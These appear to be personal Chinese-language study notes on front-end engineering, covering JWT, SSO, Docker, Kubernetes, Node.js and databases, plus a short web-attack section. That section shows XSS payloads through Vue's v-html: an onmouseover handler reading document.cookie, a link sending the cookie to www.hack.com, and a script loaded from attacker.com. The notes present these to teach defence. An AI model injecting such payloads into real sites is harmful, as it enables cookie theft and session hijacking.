调试,检验页面的js-sdk相关功能与权限,模拟大部分sdk的输入与输出 3. 使用weinre的移动调试功能,支持x5 Blink内核的远程调试 4. 利用集成的chrome DevTools协助开发 #### ***工程化*** 待整理:gps实时地图展示,流程可视化,合同模板,功能分离,常见问题解决。。。前端组件化,新兴技术如pwa,前端鉴权问题(jwt), ***前端工程化*** 参考:[前端工程化(知乎)][frontEndProjectUrl]、[我对前端工程化的理解(掘金)][howIUnderstandFrontEndProjectUrl]、[大公司里怎样开发和部署前端代码(知乎张云龙)][bigCompanyHowToDeployFrontEndCodeUrl] 几年之前,前端还是一个无足轻重的职位,日常工作无非切切图,使用jq写简单的脚本,从某种意义上,只是后端的附属物。。。但近几年,尤其Node.js出现以后,**前端的规模越来越大,已经上升到工程学的层面**,如何提高前端开发效率变得越来越重要,这就是前端工程化所要解决的问题。。。 前端工程化是使用软件工程的技术和方法来进行前端项目的开发、维护和管理。 前端工程化是根据业务特点,将前端开发流程规范化,标准化,它包括了开发流程,技术选型,代码规范,构建发布等,用于提升前端工程师的开发效率和代码质量。 前端工程化可以从模块化、组件化、规范化、自动化四个方面来思考 **1、模块化** 模块化就是将一个大文件拆分成相互依赖的小文件,再进行统一的拼装和加载,但**模块化又可以再细分为js,css,资源等** **js模块化**,在es6之前,社区有CommonJS、AMD和CMD等模块加载方案。。。到es6已经在语言层面规定了模块系统,完全可以取代之前的模块加载规范,使用起来简单同时还有**静态加载的特性**。 **css模块化**,虽然SASS、LESS、Stylus等预处理器实现了CSS的文件拆分,但没有解决CSS模块化的一个重要问题:选择器的全局污染问题。因此不同公司制定不同的CSS命名风格,但与其费尽心思地告诉别人要遵守某种规则,以规避某种痛苦,倒不如从工具层面就消灭这种痛苦。 所以从工具层面,社区又创造出Shadow DOM、CSS in JS和CSS Modules三种解决方案。 **资源模块化**,Webpack的强大之处不仅仅在于它统一了JS的各种模块系统,取代了Browserify、RequireJS、SeaJS的工作。更重要的是它的万能模块加载理念,即所有的资源都可以且也应该模块化。 资源模块化后,有三个好处: 1. 依赖关系单一化。所有CSS和图片等资源的依赖关系统一走JS路线,无需额外处理CSS预处理器的依赖关系,也不需处理代码迁移时的图片合并、字体图片等路径问题; 2. 资源处理集成化。现在可以用loader对各种资源做各种事情,比如复杂的vue-loader等等。 3. 项目结构清晰化。使用Webpack后,你的项目结构总可以表示成这样的函数:`dest = webpack(src, config)` **2、组件化** 首先,组件化≠模块化。好多人对这两个概念有些混淆。 模块化只是在文件层面上,对代码或资源的拆分;而组件化是在设计层面上,对UI(用户界面)的拆分。从UI拆分下来的每个包含模板(HTML)+样式(CSS)+逻辑(JS)功能完备的结构单元,我们称之为组件。 **3、规范化** 模块化和组件化确定了开发模型,而这些东西的实现就需要规范去落实。比如: - 目录结构的制定 - 编码规范 - 前后端接口规范 - 文档规范 - 组件管理 - Git分支管理 - Commit描述规范 - 定期CodeReview - 视觉图标规范 **4、自动化** 持续集成、自动化构建、自动化部署、自动化测试 ***前端组件化*** 有时候我们经常将一个组件的所有资源放在一个文件夹,有的将相同的资源放在一个文件夹。。。其实前者没有做到JS模块化和资源模块化,仅仅物理位置上的模块划分是没有意义的,只会增加构建的成本而已。。。 https://juejin.im/entry/59f84b9d5188253bd85cad9b http://www.alloyteam.com/2015/11/we-will-be-componentized-web-long-text/ https://www.jianshu.com/p/b304614005d4 https://tech.meituan.com/2015/07/10/frontend-component-practice.html https://leeluolee.github.io/fequan-netease/ ***JSON Web tokens*** 参考:[跨域认证解决方案JWT(阮一峰)][crossSiteJWTUrl] 即JWT是目前最流行的跨域认证解决方案,互联网服务离不开用户认证,一般流程如下: 1. 用户向服务器发送用户名和密码 2. 服务器验证通过后,在当前对话(session)里面保存相关数据,比如用户角色,登录时间等 3. 服务器向用户返回一个session_id,写入用户的Cookie 4. 用户随后的每次请求,都会通过Cookie,将session_id传回服务器 5. 服务器收到session_id,找到之前保存的数据,由此得知用户的身份 这种模式单机还好,如果是服务器集群或跨域的服务导向架构,就要求session数据共享,每台服务器都能够读取session。。。 **注意:**session一般指服务器端,但也可以理解为服务器与客户端的会话阶段。而sessionId是服务器生成的认证凭证,客户端在cookie里保存sessionId 比如a,b网站是同一家公司的服务,现在如何实现登录了a后,b就自动登录了呢? 一种方案是session数据持久化,写入数据库或别的持久层。各种服务收到请求后都向持久层请求数据。优点是架构清晰,但工程量大,另外如果持久层挂了,就会单点失败。 另一种方案是服务器索性不保存session数据了,所有数据都保存在客户端,每次请求都将session发回服务器,JWT就是这种方案的一个代表。 **JWT的数据结构** 由三部分组成: 1. Header 描述JWT的元数据,比如注明签名算法及令牌类型 ```json { "alg": "HS256", "typ": "JWT" } ``` 2. Payload 用来存放实际需要传递的数据,还可以自定义字段 ```json { "sub": "1234567890", "name": "John Doe", "admin": true } ``` **注意:**JWT默认是不加密的,任何人都可以读到,所以不要把秘密信息放在这个部分。SHA256只是安全散列算法,是不可逆的,也并不是什么加密算法。。。 还要知道,我们平时说的散列函数,hash算法等其实可以理解为一个意思。将任意长度的二级制值串映射为固定长度的二进制值串,这个映射的规则就是hash算法。通过原始数据映射之后得到的二进制串就是hash值。(从hash值不能反向推到出原始数据,所以也叫单向hash算法) 比如常用的md5的hash值是128位的bit长度(意味着不管处理多长的数据,返回的长度都是统一的),为了方便我们可以转为16进制编码 ```js // 可以发现即使差一个字符,结果就相差甚远 MD5(" 我今天讲哈希算法!") = 425f0d5a917188d2c3c3dc85b5e4f2cb MD5(" 我今天讲哈希算法 ") = a1fb91ac128e6aa37fe42c663971ac3d ``` 3. Signature 部分是对前两部分的签名,防止数据篡改 首先,需要指定一个密钥(secret)。这个密钥只有服务器才知道,不能泄露给用户。然后,使用 Header 里面指定的签名算法(默认是 HMAC SHA256),按照下面的公式产生签名。 ```js HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret) ``` 算出签名后,把三部分通过.号分隔连起来,就可以返回给用户。 **注意:**Base64URL算法和Base64算法类似,但有些不同,因为**JWT作为一个令牌(token)**,有些场合可能会放到URL里,Base64 有三个字符+、/和=,在 URL 里面有特殊含义,所以要被替换掉:=被省略,+替换成-,/替换成_ 。这就是 Base64URL 算法。 **JWT的使用方式** 客户端收到服务器返回的 JWT,可以储存在 Cookie 里面,也可以储存在 localStorage。 此后,客户端每次与服务器通信,都要带上这个 JWT。**你可以把它放在 Cookie 里面自动发送,但是这样不能跨域**,所以更好的做法是放在**HTTP 请求的头信息Authorization**字段里面。 ```js Authorization: Bearer <token> ``` 另一种做法是,**跨域的时候,JWT 就放在 POST 请求的数据体里面**。 **JWT的几个特点** - JWT 默认是不加密,但也是可以加密的。生成原始 Token 以后,可以用密钥再加密一次。 - JWT 不加密的情况下,不能将秘密数据写入 JWT。 - JWT 不仅可以用于认证,也可以用于交换信息。有效使用 JWT,可以降低服务器查询数据库的次数。 - JWT 的最大缺点是,由于服务器不保存 session 状态,因此无法在使用过程中废止某个 token,或者更改 token 的权限。也就是说,一旦 JWT 签发了,在到期之前就会始终有效,除非服务器部署额外的逻辑。 - JWT 本身包含了认证信息,一旦泄露,任何人都可以获得该令牌的所有权限。为了减少盗用,JWT 的有效期应该设置得比较短。对于一些比较重要的权限,使用时应该再次对用户进行认证。 - 为了减少盗用,JWT 不应该使用 HTTP 协议明码传输,要使用 HTTPS 协议传输。 **session与token** ***单点登录*** 参考:[一篇就懂单点登录(腾讯云)][onePageReadSSOUrl] 单点登录即Single Sing On,简称SSO,也就是在多个系统中,只需要的登录一次,就可以访问其他相互信任的应用系统 在说单点登录的实现之前,可以再看看普通的登录认证机制(JWT原理来源) 比如一个企业一般有一个一级域名(a.com),其他系统都是二级域名,如app1.a.com,app2.a.com,再有一个单点登录系统sso.a.com。。。 通过上面的理论,我们知道,如果在sso.a.com中登录了,其实是在sso.a.com的服务端的session中记录了登录状态,同时在浏览器端(Browser)的sso.a.com下写入了Cookie。那么我们怎么才能让app1.a.com和app2.a.com登录呢?这里有两个问题: 1. Cookie是不能跨域的,我们Cookie的domain属性是sso.a.com,在给app1.a.com和app2.a.com发送请求是带不上的。 2. sso、app1和app2是不同的应用,它们的session存在自己的应用内,是不共享的。 针对第一个问题,我们可以在sso登录以后,将Cookie的域设置成顶域,即a.com,这样所有子域的系统都可以访问到顶域的Cookie了。如下可设置 ```js document.cookie='name=test;path=/;domain=.a.com' ``` Cookie的问题解决了,我们再来看看session的问题。我们在sso系统登录了,这时再访问app1,Cookie也带到了app1的服务端(Server),app1的服务端怎么找到这个Cookie对应的Session呢?这里就要把3个系统的Session共享,比如Spring-Session方法 **but...**但上面都不是真正的单点登录 **不同域下的单点登录** 同域下的单点登录是巧用了Cookie顶域的特性。如果是不同域呢?不同域之间Cookie是不共享的,怎么办?也就该CAS出场了。。。 具体流程如下: 1. 用户访问app系统,app系统是需要登录的,但用户现在没有登录。 2. 跳转到CAS server,即SSO登录系统,以后图中的CAS Server我们统一叫做SSO系统。 SSO系统也没有登录,弹出用户登录页。 3. 用户填写用户名、密码,SSO系统进行认证后,将登录状态写入SSO的session,浏览器(Browser)中写入SSO域下的Cookie。 4. SSO系统登录完成后会生成一个ST(Service Ticket),然后跳转到app系统,同时将ST作为参数传递给app系统。 5. app系统拿到ST后,从后台向SSO发送请求,验证ST是否有效。 6. 验证通过后,app系统将登录状态写入session并设置app域下的Cookie。 至此,跨域单点登录就完成了。以后我们再访问app系统时,app就是登录的。接下来,我们再看看访问app2系统时的流程。 1. 用户访问app2系统,app2系统没有登录,跳转到SSO。 2. 由于SSO已经登录了,不需要重新登录认证。 3. SSO生成ST,浏览器跳转到app2系统,并将ST作为参数传递给app2。 4. app2拿到ST,后台访问SSO,验证ST是否有效。 5. 验证成功后,app2将登录状态写入session,并在app2域下写入Cookie。 这样,app2系统不需要走登录流程,就已经是登录了。SSO,app和app2在不同的域,它们之间的session不共享也是没问题的。 有的人可能会问,SSO系统登录后,跳回原业务系统时,带了个参数ST,业务系统还要拿ST再次访问SSO进行验证,觉得这个步骤有点多余。他想SSO登录认证通过后,通过回调地址将用户信息返回给原业务系统,原业务系统直接设置登录状态,这样流程简单,也完成了登录,不是很好吗? 其实这样问题时很严重的,如果我在SSO没有登录,而是直接在浏览器中敲入回调的地址,并带上伪造的用户信息,是不是业务系统也认为登录了呢?这是很可怕的。 RBAC(Role-Based Access Control,基于角色的访问控制)系统。 ***Jenkins*** 在项目的早期,测试环境需要通过jenkins来部署,而线上环境需要将项目生成的dist目录发送给运维手动上线。 在说jenkins时,需要先说说持续集成,持续集成指的是,频繁的(一天多次)将代码集成到主干,它主要好处如下: 1. 快速发现错误。每完成一点更新,就集成到主干,可以快速发现错误,定位错误也比较容易 2. 防止分支大幅偏离主分支。如果不是经常集成,主干又在不断更新,会导致以后集成的难度变大,甚至难以集成 持续集成的目的,就是让产品可以快速迭代,同时还能保持高质量。持续集成不能消除bug,而是让他们非常容易发现和改正 持续集成又分持续交互和持续部署 持续交互:指的是频繁的将软件的新版本交付给代码质量团队评审。评审通过就手动部署到测试或生产环境 持续部署:指的是将评审合格的代码,自动部署到测试或生产环境。 流程: 1. 开发提交代码至仓库 2. 仓库对commit操作配置了钩子(hook),只要有新代码提交,就会触发hook 3. 然后就会触发jenkins的自动构建,也就是通过配置的脚本,拉取最新代码,安装依赖,配置各种资源,启动服务等。而这里的构建工具就是jenkins 4. jenkins是图形化界面配置,可以自动构建,还可以手动构建。 jenkins支持构建,部署,自动化 ***Iaas,Paas,Saas*** 越来越多的软件,开始采用云服务,但云服务只是一个统称,可以分为三大类: 1. Iaas基础设施服务(Infrastructure as a service) 2. Paas平台服务(Platform as a service) 3. Saas软件服务(Software as a service) **Saas是软件的开发、管理、部署都交给第三方,不需要关心技术问题,可以直接拿来用**。普通用户接触到的互联网服务几乎都是Saas; **Paas提供软件部署平台(runtime),抽象掉了硬件和操作系统细节,可以无缝地扩展。开发者只需要关注自己的业务逻辑,不需要关注底层**。 **Iaas是云服务的最底层,主要提供一些基础资源**,他与Paas的区别是,用户需要自己控制底层,实现基础设施的使用逻辑。 打个通俗的比方:如果你是网站站长,想建立一个网站。不采用云服务,则你需要:买服务器,安装服务器软件,编写网站程序。。。 若采用Iaas服务,则不需要购买服务器 若采用Paas服务,则不需要购买服务器,也不需要安装服务器软件 若采用Saas服务,则什么都不需要购买或安装,只需要专心负责运营即可 ***docker容器*** 软件开发的难点就是环境配置,同样的代码在不同的计算机上会表现出不同的状态。 用户必须保证两件事: 1. 操作系统的设置 2. 各种库和组件的安装 虚拟机可以解决这些问题,虚拟机相当于在一个操作系统里运行另外一个操作系统,虽可还原软件的原始环境,但有以下缺点: 1. 资源占用多(会独占部分内存和硬盘空间) 2. 冗余步骤多(一些系统级别的操作步骤,无法跳过,如用户登录) 3. 启动慢(启动操作系统比较慢) 由于虚拟机的缺点,linux发展了另外一种虚拟化技术,linux容器(linux containers 缩写LXC)。**linux容器不是模拟一个完整的操作系统,而是对进程进行隔离**。或者说,在正常进程的外面套了一个保护层。对于容器里面的进程来说,它接触到的各种资源都是虚拟的,从而实现与底层系统的隔离。 **注意:**linux系统的containers(容器)其实并不真实存在,大家常说的容器其实依托于linux的两个特性(命名空间和cgroups)而运行的正常的系统进程。 制作docker镜像?? **进程与线程:**: 1. 一个程序至少有一个进程,一个进程至少有一个线程 2. 线程的划分尺度小于进程,使得多线程程序的并发性高 3. 另外,进程在执行过程中拥有独立的内存单元,而多个线程共享内存,从而极大地提高了程序的运行效率 4. 线程在执行过程中与进程还是有区别的。每个独立的线程有一个程序运行的入口、顺序执行序列和程序的出口。但是线程不能够独立执行,必须依存在应用程序中,由应用程序提供多个线程执行控制 5. 从逻辑角度来看,多线程的意义在于一个应用程序中,有多个执行部分可以同时执行。但操作系统并没有将多个线程看做多个独立的应用,来实现进程的调度和管理以及资源分配。这就是进程和线程的重要区别 容器优势: 1. 启动快(容器里的应用,直接是底层操作系统的一个进程) 2. 资源占用少(容器只占用需要的资源,而且多个容器还可以共享资源) 3. 体积小(容器只包含用到的组件,而虚拟机是整个操作系统的打包) 而docker属于linux容器的一种封装,提供简单易用的容器使用接口,**docker本身不是容器,而是创建容器的工具**。docker将应用程序与该程序的依赖,打包到一个文件里,运行这个文件,就会生成一个虚拟容器,应用在虚拟容器里运行,就好像在真实的物理机上运行一样。 既然是docker是linux容器的一种封装,那windows系统怎么办呢?答案是docker与windows合作推出了windows版本的docker ***docker镜像定制*** 1、FROM指定基础镜像,其实也就是在什么镜像的基础上扩展,比如 ubuntu、debian等等。当然如果不依赖任何镜像,还可以`FROM scratch`;<br/> 2、RUN执行命令,有以下两种格式: - shell 格式:RUN <命令> - exec 格式:RUN ["可执行文件", "参数1", "参数2"],这更像是函数调用中的格式。 ```js // 方式一 RUN echo '<h1>Hello, Docker!</h1>' > /usr/share/nginx/html/index.html // 方式二 CMD ["/data/nginx/sbin/nginx", "-g", "daemon off;"] ``` ```js FROM debian:stretch RUN apt-get update RUN apt-get install -y gcc libc6-dev make wget RUN wget -O redis.tar.gz "http://download.redis.io/releases/redis-5.0.3.tar.gz" RUN mkdir -p /usr/src/redis RUN tar -xzf redis.tar.gz -C /usr/src/redis --strip-components=1 RUN make -C /usr/src/redis RUN make -C /usr/src/redis install ``` Dockerfile 中每一个指令都会建立一层,RUN 也不例外。因此多次执行命令就会创建一个很多层的镜像,而有时很多运行时不需要的东西,都被装进了镜像里,比如编译环境、更新的软件包等等。结果就是产生非常臃肿、非常多层的镜像,不仅仅增加了构建部署的时间,也很容易出错。 Union FS 是有最大层数限制的,比如 AUFS,曾经是最大不得超过 42 层,现在是不得超过 127 层。 因此上面镜像的正确写法应该为: ```js FROM debian:stretch RUN set -x; buildDeps='gcc libc6-dev make wget' \ && apt-get update \ && apt-get install -y $buildDeps \ && wget -O redis.tar.gz "http://download.redis.io/releases/redis-5.0.3.tar.gz" \ && mkdir -p /usr/src/redis \ && tar -xzf redis.tar.gz -C /usr/src/redis --strip-components=1 \ && make -C /usr/src/redis \ && make -C /usr/src/redis install \ && rm -rf /var/lib/apt/lists/* \ && rm redis.tar.gz \ && rm -r /usr/src/redis \ && apt-get purge -y --auto-remove $buildDeps ``` 首先,之前所有的命令只有一个目的,就是编译、安装 redis 可执行文件。因此没有必要建立很多层,这只是一层的事情。因此,这里没有使用很多个 RUN 一一对应不同的命令,而是仅仅使用一个 RUN 指令,并使用 && 将各个所需命令串联起来。将之前的 7 层,简化为了 1 层。 此外,还可以看到这一组命令的最后添加了清理工作的命令,删除了为了编译构建所需要的软件,清理了所有下载、展开的文件,并且还清理了 apt 缓存文件。这是很重要的一步,我们之前说过,镜像是多层存储,每一层的东西并不会在下一层被删除,会一直跟随着镜像。因此镜像构建时,一定要确保每一层只添加真正需要添加的东西,任何无关的东西都应该清理掉。 构建镜像,在dockerfile文件所在目录执行: ```js $ docker build -t nginx:v3 . Sending build context to Docker daemon 2.048 kB Step 1 : FROM nginx ---> e43d811ce2f4 Step 2 : RUN echo '<h1>Hello, Docker!</h1>' > /usr/share/nginx/html/index.html ---> Running in 9cdc27646c7b ---> 44aa4490ce2c Removing intermediate container 9cdc27646c7b Successfully built 44aa4490ce2c ``` 从命令的输出结果中,我们可以清晰的看到镜像的构建过程。在 Step 2 中,如同我们之前所说的那样,RUN 指令启动了一个容器 9cdc27646c7b,执行了所要求的命令,并最后提交了这一层 44aa4490ce2c,随后删除了所用到的这个容器 9cdc27646c7b。 这里我们使用了 docker build 命令进行镜像构建。其格式为:`docker build [选项] <上下文路径/URL/->` 在这里我们指定了最终镜像的名称 -t nginx:v3,构建成功后,我们可以像之前运行 nginx:v2 那样来运行这个镜像,其结果会和 nginx:v2 一样。 [docker入门到实践(佳)](https://yeasy.gitbook.io/docker_practice/image/build) ***k8s(kubernetes)*** 参考:[k8s与docker][k8sAndDockerUrl]、[十分钟看懂k8s与docker][tenMinuteReadDockerUrl] 在使用docker运行容器时会为每个容器创建命名空间和cgroups,所以docker和容器一一对应,容器本质上是独立的仓库,如果容器需要与外界或相互之间通信,容器就需要存储卷或将端口映射到宿主机。另外如果同时存在很多个容器的话,如何编排,管理和调度就成了问题,因此k8s就是一套基于容器的集群管理平台。 K8s集群主要包括: 1. 一个master节点(主节点 ,负责管理和控制) 2. 一群node节点(计算节点,工作负载节点,里面是具体的容器) #### ***服务器相关*** ***express.js与hapi.js*** 1. 都是为在node(node很适合做前后端之间的中间层)环境中构建 HTTP 服务器提供方便的 API。 也就是说,比单独使用较低级别的原生 http 模块更方便。 Http 模块可以做任何我们想做的事情,但是用它来编写应用程序是很乏味的。 2. 他们都使用了高级web框架中已有的功能:路由,插件,认证模块,处理函数等(比如:当比配到一个页面的路由时,会有对应的处理函数进行处理) 3. express是非常小的,只是在http模块上提供一个很小的api,多数功能都可以通过额外的中间件来实现(中间件类似过滤器,在请求到达处理程序之前通过他们处理)。而hapi.js具有丰富的特性集,通常通过配置选项,而不需要编写代码。具体的差异可以对比二者的api文档 4. hapi具有请求生命周期并提供扩展点,与中间件类似,但在生命周期中存在多个已定义的点 5. 沃尔玛创建了hapi并停止express的原因之一,是因为很难将一个express应用拆分成单独的部分,让不同的团队成员安全的工作。 6. 一个插件就像一个子应用程序,你可以做任何可以在hapi.js应用程序里的操作,比如添加路由,扩展等。在一个插件系统里,你可以确定你没有破坏应用的其他部分,因为注册的顺序并不重要,你不能创建冲突的路线,你可以将这些插件组合到一个服务器中并进行部署。 7. 因为express只能提供很少的开箱即用功能,所以当你需要向项目中添加任何内容时,需要考虑外部因素。很多时候在使用hapi时,你需要的特性要么是内置的,要么是由核心团队创建的模块。 8. 极简主义虽然听起来不错,但如果你正在构建一个严谨的生产应用程序,hapi.js内置的很多东西或许是你需要的。hapi.js是由沃尔玛团队设计,并主要用于黑色星期五的交通,因此安全性和稳定性备受关注。也因此框架做了很多额外的事情,比如限制传入有效负载的大小,以防止耗尽进程内存。它还有一些选项,如最大事件循环延迟,最大rss内存使用和最大v8堆带下,超过这个时间,你的服务器将响应503超时,而不是崩溃。 nodemon(检测目录中的文件改动并自动重新启动应用程序) 1. 代码html修改后,webpack不自动编译,需要重启服务并刷新页面。页面不会自动更新(需要重启服务并刷新页面) 2. 修改js和css文件,webpack自动编译,不要重启服务,只需要刷新页面就好。 ***Webpack*** 该工具是打包工具,自动分拣js,css,html到不同的文件内,并通过生成的manifest或runtime来自动加载每个页面对应的资源文件。 - Cache-loader 默认为vue/babel/typescript编译开启,缓存在node_modules/.cache,编译出现问题时,删掉此目录 - Thread-loader 多核cpu的机器上为babel/typescript转译开启 - .browserslistrc文件 指定目标浏览器的范围 会被@babel/preset-env和postcss使用 **exclude/include路径** *与**/*意义不同, - *指resource路径下,并不包含resource子文件夹下的文件 - **/*指resource路径及其子路径下所有文件。 **package.json字段解析** [package.json字段解析(阮一峰)](http://javascript.ruanyifeng.com/nodejs/packagejson.html) [npm官方文档](https://docs.npmjs.com/files/package.json) [npm中script字段解析(官方)](https://docs.npmjs.com/misc/scripts) - main:模块的入口文件,一个包可以理解为一个模块,然后其他用户安装这个包或许就会用`require('foo')`,这时main字段就会执行字段的value值并返回结果,挂载在module.exports上 - scripts:程序生命周期内的脚本命令(有些预置命令如preinstall,postinstall,其实就是在npm install之前或之后会执行的操作) - bin:很多软件包都有一个或多个可执行文件,这些执行文件想把模块的命令安装到环境变量PATH中,从而可以直接使用包里的命令,其实可以理解为alias,alias是程序的别名,当使用别名时其实底层调用的就是程序真实的路径。然后bin字段里定义的字段,就可以直接在scripts里使用,相当于使用alias **node模块解析算法** 解析路径分为相对和非相对,相对的是以/,./或../开头,而所有其他形式都为非相对导入。。。 例如,假设有一个文件路径为 /root/src/moduleA.js,包含了一个导入var x = require("./moduleB")。Node.js的解析过程为: 1. 检查/root/src/moduleB.js文件是否存在。 2. 检查/root/src/moduleB目录是否包含一个package.json文件,且package.json文件指定了一个"main"模块。 在我们的例子里,如果Node.js发现文件 /root/src/moduleB/package.json包含了{ "main": "lib/mainModule.js" }, 3. 检查/root/src/moduleB目录是否包含一个index.js文件。 这个文件会被隐式地当作那个文件夹下的"main"模块。 假设/root/src/moduleA.js里使用的是非相对路径导入var x = require("moduleB");。 Node则会以下面的顺序去解析 moduleB,直到有一个匹配上: 1. /root/src/node_modules/moduleB.js 2. /root/src/node_modules/moduleB/package.json (如果指定了"main"属性) 3. /root/src/node_modules/moduleB/index.js 4. /root/node_modules/moduleB.js 5. /root/node_modules/moduleB/package.json (如果指定了"main"属性) 6. /root/node_modules/moduleB/index.js 7. /node_modules/moduleB.js 8. /node_modules/moduleB/package.json (如果指定了"main"属性) 9. /node_modules/moduleB/index.js typescript模块解析规则与node相似,只是每次检查都会检查.ts,.tsx,.d.ts后缀的文件。 ***vue-cli的原理*** 其实vue-cli是封装了一下webpack,在目前公司的脚手架就和vue没有任何关系。。。webpack本身有dev-server等(公司里用的是node+express)。。。其实可以这样理解,vue-cli调用webpack的一些接口实现一些基本配置,然后再通过命令行提示用户是否安装扩展功能,安装完以后,如果用户想再自定义配置,可以通过修改配置文件(如:vue.config.js),然后vue-cli内部会对这些配置文件进行merge处理,最终达到用户自定义配置的效果。 公司的脚手架虽然有ffe工具,但是这个工具做的工作无非是将做好的模板放在gitlab上,通过ffe工具把这些模板拉下来而已,这个模板是已经配置好了(所谓配置好了,就是各种babel,loader,plugin等都配置好了),下载完只需要安装依赖,启动服务即可。。。 ***Node.js*** Node.js 所有的异步 I/O 操作在完成时都会发送一个事件到事件队列。 Node.js所有的异步I/O操作在完成时都会发送一个事件到事件队列。Node.jss里面的许多对象都会分发事件:一个net.Server对象会在每次有新连接时触发一个事件,一个fs.readStream对象会在文件被打开时触发一个事件,所有这些产生事件的对象都是events.EventEmitter的实例 events模块只提供一个对象events.EventEmitter,EventEmitter的核心就是**事件触发与事件监听器**功能的封装 ```js var EventEmitter = require('events').EventEmitter var event = new EventEmitter() // event.on('some_event',() => { // console.log('some_event 触发了') // }) // 还可以这样 event.addListener('some_event',() => { console.log('some_event 触发了') }) setTimeout(()=>{ event.emit('some_event') },3000) // 移除事件 // event.removeListener('some_event',callback) ``` #### ***数据库相关*** 1. 关系型是指采用关系模型(二维表格模型)组织数据的数据库,具有事务一致性(任何人看到的数据都一致),也因此读写性能稍差 2. 非关系型大多开源,大多以键值对存储,且结构不固定,每一个元组可以有不一样的字段,每个元组可以根据需要增加一些自己的键值对,这样就不会局限于固定的结构,可以减少一些时间和空间的开销。 关系型数据库:Oracle、MySQL、SQLServer 非关系型数据库(NoSQL):MongoDB 注意:其实非关系性数据库NoSQL是一个门类,其下有像MongoDB这样的以键值存放的数据库。另外Mongoose是在node.js环境下对mongodb进行便捷操作的对象模型工具,Mongoose使mongodb操作更加简单快捷。 性能 - NOSQL是基于键值对的,可以想象成表中的主键和值的对应关系,而且不需要经过SQL层的解析,所以性能非常高。 - 可扩展性同样也是因为基于键值对,数据之间没有耦合性,所以非常容易水平扩展。 关系型数据库的优势: - 复杂查询可以用SQL语句方便的在一个表以及多个表之间做非常复杂的数据查询。 - 事务支持使得对于安全性能很高的数据访问要求得以实现。 1. 数据存储结构: 首先关系型数据库一般都有固定的表结构,并且需要通过DDL语句来修改表结构,不是很容易进行扩展,而非关系型数据库的存储机制就有很多了,比如基于文档的,K-V键值对的,还有基于图的等,对于数据的格式十分灵活没有固定的表结构,方便扩展,因此如果业务的数据结构并不是固定的或者经常变动比较大的,那么非关系型数据库是个好的选择 2. 可扩展性 传统的关系型数据库给人一种横向扩展难,不好对数据进行分片等,而一些非关系型数据库则原生就支持数据的水平扩展(比如mongodb的sharding机制),并且这可能也是很多NoSQL的一大卖点,其实象Mysql这种关系型数据库的水平扩展也并不是难,即使NoSQL水平扩展容易但对于向跨分片进行joins这种场景都没有什么太好的解决办法,不管是关系型还是非关系型数据库,解决水平扩展或者跨分片Joins这种场景,在应用层和数据库层中间加一层中间件来做数据处理也许是个好的办法 3. 数据一致性 非关系型数据库一般强调的是数据最终一致性,而不没有像ACID一样强调数据的强一致性,从非关系型数据库中读到的有可能还是处于一个中间态的数据,因此如果你的业务对于数据的一致性要求很高,那么非关系型数据库并不一个很好的选择,非关系型数据库可能更多的偏向于OLAP场景,而关系型数据库更多偏向于OLTP场景 #### ***linux相关*** ***unix、linux、mac相爱相杀*** 参考:[unix、linux、mac科普篇][unix&Linux&MacStoryUrl]、[Linux vs Unix][unix&LinuxDiffUrl] linux是一个采用了unix的设计思想,初始行为表现与unix相同的操作系统,但Linux中的源码并未有任何出自Unix。Linux符合一切皆文件的思想,其中**读写操作都是处理文件描述符**,无论是文件描述符后面的是真正要打开的文件,还是进程间通信的套接字,对于用户而言都是**操作**文件描述符。。。 **虚拟内存:**是计算机系统内存管理的一种技术。它使得应用程序认为它拥有连续的可用的内存(一个连续完整的地址空间),而实际上,它通常是被分隔成多个物理内存碎片,还有部分暂时存储在外部磁盘存储器上,在需要时进行数据交换。目前,大多数操作系统都使用了虚拟内存,如Windows家族的“虚拟内存”;Linux的“交换空间”等。 ***mac常用命令*** ***常用编辑器*** #### ***常见网络攻击*** ***XSS:*** 跨站脚本攻击(cross site scripting),为了不和层叠样式表(cascading style sheets,css)缩写混淆,所以将跨站脚本攻击缩写为xss。 参考: [xss攻击示例][xssExampleUrl]、[xss攻击转义][xssAttackDecodeURL]、[常见web攻击][usualWebSecurityUrl] vue等框架在渲染时,大括号语法会将数据渲染为普通文本,而非html代码,如果要输出真正的html,需要使用v-html指令。也就是vue的安全策略,默认把所有动态内容渲染为纯文本,当你需要把内容执行的时候需要显示调用v-html指令,如下: 如果在vue文件里这样写: ```html <div id="app" > Welcome : <span v-html="attack"></span> </div > ``` ```js new Vue({ el: '#app', data: { attack: '<script > alert(document.cookie)</script >', } }); ``` 但是:上面的alert并不会执行,因为浏览器阻止在初始页面加载后执行注入的脚本标记 但是我们可以这样做: ```js new Vue({ el: '#app', data: { attack: '<a onmouseover=alert(document.cookie)>click me!</a>', } }); ``` 上面已经拿到了页面的cookie,如果此时再给a标签添加一个href="www.hack.com?ctx=document.cookie",则用户的数据就被发送到其他网页了。。。 当然上面是监听mouseover事件触发js执行,还可以监听任意事件触发,当然img的src属性还可以请求第三方脚本进而执行,如:`<img src="attacker.com/attack.js" />` xss分类: - 反射性xss - 持久性xss - DOM-based xss 反射性的xss,其实可以理解为前端输入一个字符串,后端拿到之后也没有做处理,然后又直接返回给前端。。。前端也没有做处理,此时如果字符串里含有script标签,则会被执行。。。如果其他用户点击这种类型的链接,则会被攻击。。。 普通xss 攻击,通过html 转义就可以很好地解决,但是富文本编辑器,本身就是允许输入html 标签的,不能转义,需要引入第三方防止xss的包来处理,对文章内html 进行处理,可以自定义过滤规则,参考:[根据白名单过滤HTML(防止XSS攻击)](https://jsxss.com/zh/index.html) #### ***chrome相关*** 技巧一:打开控制台 -> 右下角`Event Listener Breakpoints`选择事件类型 -> 一直按住||(Pause script excution)键 -> 等到触发指定时间后松手即可进入单步调试状态 -> 进而可以静态 #### ***新技术相关*** ***PWA*** 参考:[PWA开发文档][PWADocumentUrl] Progressive Web App, 简称 PWA,是提升 Web App 的体验的一种新方法,能给用户原生应用的体验。 PWA 能做到原生应用的体验不是靠特指某一项技术,而是经过应用一些新技术进行改进,在安全、性能和体验三个方面都有很大提升,PWA 本质上是 Web App,借助一些新技术也具备了 Native App 的一些特性,兼具 Web App 和 Native App 的优点。 PWA 的主要特点包括下面三点: - 可靠 - 即使在不稳定的网络环境下,也能瞬间加载并展现 - 体验 - 快速响应,并且有平滑的动画响应用户的操作 - 粘性 - 像设备上的原生应用,具有沉浸式的用户体验,用户可以添加到桌面 PWA 本身强调渐进式,并不要求一次性达到安全、性能和体验上的所有要求, ***Service Worker*** 前端工程师有很多性能优化的手段,包括 CDN、CSS 